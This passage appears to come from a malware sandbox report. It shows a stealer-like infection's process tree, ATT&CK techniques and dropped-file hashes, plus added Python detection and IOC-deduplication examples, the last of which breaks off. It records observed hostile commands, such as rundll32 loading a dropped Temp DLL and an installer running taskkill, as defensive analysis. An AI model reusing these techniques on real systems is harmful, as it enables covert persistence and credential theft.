  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\srtasks.exe
  cmd: C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:5
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 5884 -ip 5884
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\svchost.exe
  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\WerFault.exe
  cmd: C:\Windows\system32\WerFault.exe -pss -s 440 -p 6060 -ip 6060
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 7048 -ip 7048
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\system32\msiexec.exe
  cmd: C:\Windows\system32\msiexec.exe /V
  - Enumerates connected drives
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
    C:\Windows\syswow64\MsiExec.exe
      cmd: C:\Windows\syswow64\MsiExec.exe -Embedding 0AF591EB79C8CD6C81E2FCFBC2178825 C
      - Loads dropped DLL
    C:\Windows\syswow64\MsiExec.exe
      cmd: C:\Windows\syswow64\MsiExec.exe -Embedding 191FD6F86B0010D2F41C83786C0EDF3F
      - Blocklisted process makes network request
      - Loads dropped DLL
        C:\Windows\SysWOW64\taskkill.exe
          cmd: "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
          - Kills process with taskkill
    C:\Windows\syswow64\MsiExec.exe
      cmd: C:\Windows\syswow64\MsiExec.exe -Embedding 23188DF435584527F3BA7A7E67AD8223 E Global\MSI0000
      - Drops file in Windows directory
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4540 -ip 4540
  - Suspicious use of NtCreateProcessExOtherParentProcess
  - Checks processor information in registry
  - Enumerates system info in registry
C:\Windows\SysWOW64\WerFault.exe
  cmd: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 6172 -ip 6172
  - Suspicious use of NtCreateProcessExOtherParentProcess
C:\Windows\SysWOW64\rundll32.exe
  cmd: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7732 -s 4562⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 7732 -ip 77321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1636 -ip 16361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3112 -s 4563⤵
- Program crash
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 3112 -ip 31121⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 5036 -ip 50361⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4540 -ip 45401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
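Several rows in the tree above are worth turning into detections rather than reading once: rundll32.exe loading sqlite.dll out of the user's Temp directory (a SQLite DLL dropped beside a stealer is how it reads browser credential databases), the rundll32 instance flagged as an unexpected child, an MSI custom action (MsiExec.exe -Embedding) spawning taskkill.exe /im with a wildcard, four-hex-character executables such as 2D3F.exe and 7229.exe running from Temp, and pid 4540 being handed to WerFault.exe -pss eleven times. The Python below is an added example, not part of the Triage report or of any vendor tooling: it runs those heuristics over constructed process-creation events modelled on the tree. The pids, the rundll32 parent allow-list and the crash threshold are assumptions, and parent images are made up where the export does not show them.

```python
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (the shape Sysmon event 1 or EDR telemetry provides)."""
    pid: int
    ppid: int
    image: str          # full path of the new process
    parent_image: str   # full path of its parent
    cmdline: str


# Heuristics drawn from the process tree. The parent allow-list and the crash
# threshold are assumptions to tune per estate, not values from the report.
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(appdata|documents|downloads|desktop)\\", re.I)
HEX_DROP_NAME = re.compile(r"^[0-9a-f]{4}\.exe$", re.I)
RUNDLL32_DLL = re.compile(r'"?([a-z]:\\[^",]+\.dll)"?,', re.I)   # the "<dll>",<export> argument
WERFAULT_TARGET = re.compile(r"-p\s+(\d+)")                        # pid of the crashing process
RUNDLL32_OK_PARENTS = {"explorer.exe", "svchost.exe", "rundll32.exe", "msiexec.exe", "userinit.exe", "cmd.exe"}
CRASH_THRESHOLD = 3


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, pid, detail) tuples for every event that trips a heuristic."""
    hits = []
    crashes_per_target = Counter()
    for ev in events:
        img = basename(ev.image)
        parent = basename(ev.parent_image)
        if img == "rundll32.exe":
            m = RUNDLL32_DLL.search(ev.cmdline)
            if m and USER_WRITABLE.match(m.group(1)):
                hits.append(("rundll32_user_dll", ev.pid, m.group(1)))
            if parent not in RUNDLL32_OK_PARENTS:
                hits.append(("rundll32_unexpected_parent", ev.pid, parent))
        elif img == "taskkill.exe" and "/im" in ev.cmdline.lower() and parent == "msiexec.exe":
            hits.append(("installer_kills_process", ev.pid, ev.cmdline))
        elif USER_WRITABLE.match(ev.image) and HEX_DROP_NAME.match(img):
            hits.append(("hex_named_temp_exe", ev.pid, ev.image))
        elif img == "werfault.exe":
            m = WERFAULT_TARGET.search(ev.cmdline)
            if m:
                crashes_per_target[int(m.group(1))] += 1
    # Volume signal: the same pid crashing over and over, not WerFault itself
    for target, n in crashes_per_target.items():
        if n >= CRASH_THRESHOLD:
            hits.append(("repeated_crash", target, f"{n} WerFault invocations"))
    return hits


# Constructed sample events modelled on the tree above. Parent images are
# assumptions (the export does not show them); pid 7000 is a benign control.
SAMPLE_EVENTS = [
    ProcEvent(2552, 4540, r"C:\Users\Admin\AppData\Local\Temp\2D3F.exe",
              r"C:\Windows\explorer.exe",
              r"C:\Users\Admin\AppData\Local\Temp\2D3F.exe"),
    ProcEvent(8008, 4540, r"C:\Users\Admin\AppData\Local\Temp\7229.exe",
              r"C:\Windows\explorer.exe",
              r"C:\Users\Admin\AppData\Local\Temp\7229.exe"),
    ProcEvent(5036, 4884, r"C:\Windows\system32\rundll32.exe",
              r"C:\Windows\system32\wbem\wmiprvse.exe",
              r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global'),
    ProcEvent(3112, 5036, r"C:\Windows\SysWOW64\rundll32.exe",
              r"C:\Windows\system32\rundll32.exe",
              r'rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global'),
    ProcEvent(6100, 6080, r"C:\Windows\SysWOW64\taskkill.exe",
              r"C:\Windows\syswow64\MsiExec.exe",
              r'"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f'),
    ProcEvent(7000, 4540, r"C:\Windows\System32\notepad.exe",
              r"C:\Windows\explorer.exe", "notepad.exe"),
] + [
    ProcEvent(9000 + i, 1636, r"C:\Windows\SysWOW64\WerFault.exe",
              r"C:\Windows\System32\svchost.exe",
              rf"C:\Windows\SysWOW64\WerFault.exe -pss -s {400 + 8 * i} -p 4540 -ip 4540")
    for i in range(6)
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} pid={pid:<6} {detail}")
```

Against real telemetry the parent allow-list has to reflect the estate (installers and logon scripts legitimately start rundll32), and the crash rule keys on the pid passed in `-p`, since WerFault.exe itself is a signed Windows binary and is not the thing to alert on.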
MITRE ATT&CK Matrix (ATT&CK v6)

Persistence
- Modify Existing Service: 1
- Registry Run Keys / Startup Folder: 1
- Scheduled Task: 1
- BITS Jobs: 1

Defense Evasion
- Modify Registry: 6
- Disabling Security Tools: 4
- Virtualization/Sandbox Evasion: 1
- BITS Jobs: 1
- Install Root Certificate: 1
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
  MD5    f406f50ae5ee96095facdbca6ee7f55d
  SHA1   bea74547c72a7ae3de32271f7f39c1a31f0d4e9a
  SHA256 1ef0332805c139de14698a1026e1b0aa01af5506e6024c5ed0613824e6027b23
  SHA512 2ca489bf5770f1cbb413a3b6b396212c5faf8ba7e6cac3f8fb07bd192bec9fe2ff8df58a5c9ea847b6868d9ea5eaf99e41582a70792fb290c22b867e63dd26d9

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1008c7d6874.exe
  MD5    7b3895d03448f659e2934a8f9b0a52ae
  SHA1   084dc9cd061c5fb90bfc17a935d9b6ca8947a33c
  SHA256 898149d20045702c1bf0c4e552a907c763912d4e5d9cf5b348e1aae80928b097
  SHA512 dcc1a140f364d7428fcf3ca85613a911524eb7872ef9076c89a8252fa16cefcdd3fe6d355c857585f8cea8f3e00a43f7ea088c296ecdb3012179db148cc6b25d

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1015b9a4e0b.exe
  MD5    1b30ac88a74e6eff68433de176b3a5c3
  SHA1   31039df81b419ae7f777672785c7bcf9e7004d04
  SHA256 0fd88e63305a7a711efc11534ab1b681d7ad419c2832a2ac9f79a9860d520e28
  SHA512 c6fb8368cfba84ce3c09c30345b05fce8f30bc59536fecd4b9226bbd2d0bde5910f162b8c68985f99ba10bc9564503a26712b9af8937ef03634a3f5bd3c0f730

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1018ef4aa251c026c.exe
  MD5    b7f786e9b13e11ca4f861db44e9fdc68
  SHA1   bcc51246a662c22a7379be4d8388c2b08c3a3248
  SHA256 f8987faadabfe4fd9c473ac277a33b28030a7c2a3ea20effc8b27ae8df32ddf6
  SHA512 53185e79e9027e87d521aef18488b57b900d3415ee132c3c058ed49c5918dd53a6259463c976928e463ccc1e058d1c9c07e86367538c6bed612ede00c6c0f1a5

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri1034cd265b5e0adcd.exe
  MD5    b4dd1caa1c9892b5710b653eb1098938
  SHA1   229e1b7492a6ec38d240927e5b3080dd1efadf4b
  SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
  SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri103a7805577.exe
  MD5    cf4029ca825cdfb5aaf5e9bb77ebb919
  SHA1   eb9a4185ddf39c48c6731bf7fedcba4592c67994
  SHA256 c5761c7d94d975a44e08caf948531b363c30e3f78d7b45a7b28bda39beb4e534
  SHA512 d3e31b35c49f1608dfe5ee97e96a26e4548e49325bd04408e5b15efb5f8f3a39f5abe58e9ec0ad7bf20cb13d967eec2f11634332a0a79d525521bbd9c0b5c6d1

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri105268dda3.exe
  MD5    5ce20e8fc69de75848f34beb5522a676
  SHA1   9552dcc7ef39e2174ab18b856c4c145bfac0c6c3
  SHA256 07fd0812403fa09004fd4d595fdd8b680fb5707644b140909fd2e0bf54d6ea56
  SHA512 835c302805cb4f68b0a77c274cdbcab7910635679e183d84065fa35569d7db60dc8989b2f3564949d3213e2425481d9242be35691e9b45ccd96274ec481f76ea

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10584c049c7f.exe
  MD5    118cf2a718ebcf02996fa9ec92966386
  SHA1   f0214ecdcb536fe5cce74f405a698c1f8b2f2325
  SHA256 7047db11a44cfcd1965dcf6ac77d650f5bb9c4282bf9642614634b09f3dd003d
  SHA512 fe5355b6177f81149013c444c244e540d04fbb2bcd2bf3bb3ea9e8c8152c662d667a968a35b24d1310decb1a2db9ac28157cda85e2ef69efee1c9152b0f39089

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri106e757f6d75.exe
  MD5    09aafd22d1ba00e6592f5c7ea87d403c
  SHA1   b4208466b9391b587533fe7973400f6be66422f3
  SHA256 da137a976b0690462ffbe4d94bf04f4e9d972b62d3672bc3b6e69efb9dc004d4
  SHA512 455189206c764b73f1753f8221a01c6a1f25d530dd5629f503cec1d519a1117666ecf593ba0896e7b72c74681857ce3a5245e35c799be81012532157d0ac74fd

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10720d229511df563.exe
  MD5    1c726db19ead14c4e11f76cc532e6a56
  SHA1   e48e01511252da1c61352e6c0a57bfd152d0e82d
  SHA256 93b5f54f94405535eefa0e95060c30ce770d91dc4c53b8aeced132e087d5abf7
  SHA512 83e4c67113c03098b87e3e7a3f061cdb8b5dad39105f6aa1eadde655113bdbf09ed4bd1805302d0fd04cbae8c89af39c8320386f1f397a62c790171255eb2c3b

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10acd1e0a9e6.exe
  MD5    8a2c5f6bea81ed4226ac84573aa395ac
  SHA1   c4734e0141ac588fb408945f2d53df0c5f6ed3ed
  SHA256 a55bae71255adf3d31751cef7df023242a517986ea54d4dc6ece4530805f0de6
  SHA512 67101badd8642fa08e9b0bff7943727d7a3d67340d7b237ece766df7f58f18ef6e89dfa6c18d8400496c8487680570e8fe6941f1ddbf38a638df25e3aae72892

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10b0a06a73706.exe
  MD5    b2580782c8114a9741a95a8dbbf9da98
  SHA1   dfdbe5fd8a20dc06eecaee57d0b3231947c27461
  SHA256 7674e7594befa8ca66288c18601c1a6545f4d827a63874dca605a51937e52015
  SHA512 b5cdfd6274e9368160378ad02e377bb9404d94cdc3a9726230c10f0d73a2d7c5a4ee590e4decd9f16712ed0f5efe56b507dd77812a7a926e34ca9eb3c693da62

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10d184202996a0d7f.exe
  MD5    ba23703b6517a2399fa411a8fd18718d
  SHA1   670c9ed3c1429eddfc93f358222306de5ae84396
  SHA256 7592158128c99f0cd4df4814aec929d29699b320cfaba891c8883b624ae0600b
  SHA512 622edea55a076d93dfceaee71a8e11b05ef7c76784225c8092c0c75bf62ee4f0195cd991ba7ef93f3296413e8cee311215d575a188924e33612f8ee80df741f5

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\Fri10fcc13ae0125c8.exe
  MD5    fa0bea4d75bf6ff9163c00c666b55e16
  SHA1   eabec72ca0d9ed68983b841b0d08e13f1829d6b5
  SHA256 0e21c5b0e337ba65979621f2e1150df1c62e0796ffad5fe8377c95a1abf135af
  SHA512 9d9a20024908110e1364d6d1faf9b116adbad484636131f985310be182c13bb21521a73ee083005198e5e383120717562408f86a798951b48f50405d07a9d1a2

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurl.dll
  MD5    d09be1f47fd6b827c81a4812b4f7296f
  SHA1   028ae3596c0790e6d7f9f2f3c8e9591527d267f7
  SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
  SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libcurlpp.dll
  MD5    e6e578373c2e416289a8da55f1dc5e8e
  SHA1   b601a229b66ec3d19c2369b36216c6f6eb1c063e
  SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
  SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libgcc_s_dw2-1.dll
  MD5    9aec524b616618b0d3d00b27b6f51da1
  SHA1   64264300801a353db324d11738ffed876550e1d3
  SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
  SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libstdc++-6.dll
  MD5    5e279950775baae5fea04d2cc4526bcc
  SHA1   8aef1e10031c3629512c43dd8b0b5d9060878453
  SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
  SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\libwinpthread-1.dll
  MD5    1e0d62c34ff2e649ebc5c372065732ee
  SHA1   fcfaa36ba456159b26140a43e80fbd7e9d9af2de
  SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
  SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS4DD080A0\setup_install.exe
  MD5    baa61c7ac272018ef3c9162121f2f728
  SHA1   a9eb477fe841000152082f0d3025af99d38981b1
  SHA256 1d1233690888a2677f7febba2d9a7bfc1a86324b40f3a94a64218c2d29191cd2
  SHA512 5f66dc3a0f0335bc4f60d4168a92e9bc4a469b2450340f59b966b75f57abb7cc62179985a09dc2fdc8c940d66506bf8e18e9ce0dc8a2e6b1c873bab61463baae

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
  MD5    93460c75de91c3601b4a47d2b99d8f94
  SHA1   f2e959a3291ef579ae254953e62d098fe4557572
  SHA256 0fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
  SHA512 4370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856

C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
  MD5    ad7bebc20cabc97e704668c3bb83af78
  SHA1   e6a2be8bbd188c8c4fb98d98a62bc82d24f72021
  SHA256 4f88c1f5c3b4301211a1ac730dea099898f2df0d56ed049027606ddb7257cfa4
  SHA512 0bbd848084ec9f657303a25141956872f14bcabe8775c3906aa42f923c0079d7ba68220df87f6c096fdb9b808e38755f0aaf356d3041ec1c9e9f0e154b7f0a66

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  MD5    8b7668116562b56d18d052701cd0b6a9
  SHA1   8a60832719ce8e0379d63d320f341a9bba1ac627
  SHA256 aa4d5452dac85083f5fd183f457f5dab7b391148c58d6abe040246fc26b81244
  SHA512 03d16880dbaad41646596c26a6b621c885699da3cb511253ac44bce79e3b14560ba700ad751000023719657ca1398309f92784552426e4221381853c00862686

C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe  (identical hashes to 7zS4DD080A0\Fri1034cd265b5e0adcd.exe above)
  MD5    b4dd1caa1c9892b5710b653eb1098938
  SHA1   229e1b7492a6ec38d240927e5b3080dd1efadf4b
  SHA256 6a617cd85f6e4fa3861d97d1f8197e909f6ca895a1c6139171d26068656a4c95
  SHA512 6285d20d85c2ca38c8dbb92bc8985371cddc9dbe042128e0cc6a48b24e52e5990a196b424a59aa84e551b67c91f5f58894dca2b9c5b130ea78076768e15ecae8

C:\Users\Admin\AppData\Local\Temp\inst001.exe
  MD5    23bcdc132d1f2aaf8d248b6a5bd21801
  SHA1   2153acec77f4a57c621a3e38d523eb6df9b29134
  SHA256 a7cb6d861c75f36c32cb5a304b0d8d84b5bc0bedd7da2eb942e4d67288f7123b
  SHA512 d9684eab46e5431bc69b70154bbef7a3126f0719a80792f120a3a436e6f4f23cf1229d4b4293c1aff4202ab748144ce19dbc4c39f74f631e1b6f9336259f02db

C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\Sayma.exe
  MD5    81434c79f3c738393815924a1c528780
  SHA1   6de14642801127b7cfab47f0c6453c7cd6cab6e2
  SHA256 ba169eb8dc4d8a6df6bb725a82eedb97ec0ae81a8da5543959d7afdff8262fb2
  SHA512 8b8233abafa0f94286058adbe151fd2d46b717a9d0b6cca864c647402750c8e433ae18cf4b8b6b55576e4dc8481aa13696d541ddb1a2886efeeff2c3447ef976

C:\Users\Admin\AppData\Local\Temp\is-M5BBB.tmp\idp.dll
  MD5    8f995688085bced38ba7795f60a5e1d3
  SHA1   5b1ad67a149c05c50d6e388527af5c8a0af4343a
  SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
  SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\is-MHCJ5.tmp\Fri10fcc13ae0125c8.tmp
  MD5    f39995ceebd91e4fb697750746044ac7
  SHA1   97613ba4b157ed55742e1e03d4c5a9594031cd52
  SHA256 435fd442eec14e281e47018d4f9e4bbc438ef8179a54e1a838994409b0fe9970
  SHA512 1bdb43840e274cf443bf1fabd65ff151b6f5c73621cd56f9626360929e7ef4a24a057bce032ac38940eda7c7dca42518a8cb61a7a62cc4b63b26e187a539b4a0

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  MD5    2da8ab89fff4bfc1be98d577169e3cf8
  SHA1   5379737ccaf546c86fe92ee92e49afaa2eef1bee
  SHA256 28043b9d96a6d54044950bca23633ab601dcfdbe4305bd18f624209e974d4e14
  SHA512 d66421b77efee5b7338bf877243afdec0e4e9023ef3671ac69bc789f53688d9c74c8ed99486f53609ff0b8fb2848dd2f30ba46e40386a0c829bcaf4d8782a97c

C:\Users\Admin\AppData\Roaming\1545689.scr
  MD5    092a86f44c26ef2f8b5a0e96b2bc014a
  SHA1   be9ee727bf5952ca25df9ee81e799c97061f2d45
  SHA256 e405452921114ff55e0aca1f634ce14e7a269bf51d20ea49038dd08b3255bf93
  SHA512 d69af28cacecc8f5834efa803b7907281a3f83bbfe2736a2087235f0b97630ce8870c50878cf480b944e219bf9ecb3949fa46f938b5b99f32bf1ee6d1147126c

C:\Users\Admin\AppData\Roaming\3012335.scr
  MD5    d737f324acc3517c3eab65915a43d902
  SHA1   af45738908cdd4d9b9ad66c567178b37a1bed3e1
  SHA256 b4000ef63442b7f1efdd1cc2c26e5114e6266633d44fa6ec991c48fa59e08a0b
  SHA512 109943fbc0153d0b540977992caa5266155b965a5ca1851320fad683a54a33ff4de42c50c51d2c5730e9cf9dbcf16e69c4c171ef3a69b1e023c474ae995ebda6

C:\Users\Admin\AppData\Roaming\8350716.scr
  MD5    454c02aed9ebed0bcbf09332ecb0ef70
  SHA1   1165d4ba8db7dcc0c78d43369282bd0e5062fd35
  SHA256 5b924e943151f86fadbc9306293f9d45b8f30825f914fece288ca568bb1aeee9
  SHA512 52e40ad43b88545563ec1fb896052e59303107349fd07837cdc1219c3db769d54c431f6cb58010744fb8ea7f1ccd63454e748b75843d0705d2aaef1c475e1575

C:\Users\Admin\Documents\w2uxcc4cMRtRDh1lxPYaRWBr.exe
  MD5    3f22bd82ee1b38f439e6354c60126d6d
  SHA1   63b57d818f86ea64ebc8566faeb0c977839defde
  SHA256 265c2ddc8a21e6fa8dfaa38ef0e77df8a2e98273a1abfb575aef93c0cc8ee96a
  SHA512 b73e8e17e5e99d0e9edfb690ece8b0c15befb4d48b1c4f2fe77c5e3daf01df35858c06e1403a8636f86363708b80123d12122cb821a86b575b184227c760988f
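Two things about the dropped-file list matter when it becomes blocklist material: rows are repeated verbatim, and the same bytes appear under two names (SkVPVS3t6Y8W.EXe carries exactly the hashes of 7zS4DD080A0\Fri1034cd265b5e0adcd.exe). Deduplicate on the SHA256 rather than the path, and check digest lengths before anything is loaded into a detection feed. The Python below is an added example, not from the report or from Triage: it parses the flattened export layout seen in this page's raw text (the MD5 label glued onto the path with the digest on the next line, the other labels glued onto their digests), validates each record, collapses records by SHA256 and reports payloads dropped under more than one name. The sample input is constructed; it reuses the hashes of those two files and of libcurl.dll from the list, keeps the page's verbatim duplicate, and adds one made-up record with a truncated SHA256.

```python
import re
from collections import defaultdict

# Expected hex length of each digest the sandbox export carries
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_GLUED = re.compile(r"^(SHA512|SHA256|SHA1|MD5)([0-9a-fA-F]*)$")   # label glued to digest
_HEX = re.compile(r"^[0-9a-fA-F]+$")


def parse_dropped_files(text):
    """Parse the flattened 'Downloads' export into one dict per record.

    A record starts with '<path>MD5'; its MD5 digest is on the next line and
    the SHA1/SHA256/SHA512 lines carry the label glued to the digest.
    """
    records, cur, pending = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("", "-"):
            continue
        if pending and _HEX.match(line):          # digest that followed a bare label
            cur[pending] = line.lower()
            pending = None
            continue
        m = _GLUED.match(line)
        if m and cur is not None:
            label, digest = m.groups()
            if digest:
                cur[label] = digest.lower()
            else:
                pending = label
            continue
        if line.endswith("MD5"):                  # '<path>MD5' starts a new record
            cur = {"path": line[:-3]}
            records.append(cur)
            pending = "MD5"
        # anything else is unrecognised debris and is skipped
    return records


def validate(records):
    """Split records into (good, bad): bad if any digest is missing or mis-sized."""
    good, bad = [], []
    for r in records:
        ok = all(len(r.get(k, "")) == n for k, n in HEX_LEN.items())
        (good if ok else bad).append(r)
    return good, bad


def consolidate(records):
    """Group by SHA256: one IOC per distinct content, with every path it was seen under."""
    by_hash = defaultdict(set)
    for r in records:
        by_hash[r["SHA256"]].add(r["path"])
    return {h: sorted(paths) for h, paths in by_hash.items()}


def renamed_copies(by_hash):
    """Hashes seen under more than one file name: the same payload dropped twice."""
    return {h: paths for h, paths in by_hash.items() if len(paths) > 1}


# Constructed sample in the export's own layout. The first four records reuse
# the Fri1034.../SkVPVS3t6Y8W.EXe/libcurl.dll hashes from the list above (with
# the page's verbatim duplicate kept in); the last record is made up, with a
# truncated SHA256, to exercise validation.
SAMPLE_EXPORT = r"""
-
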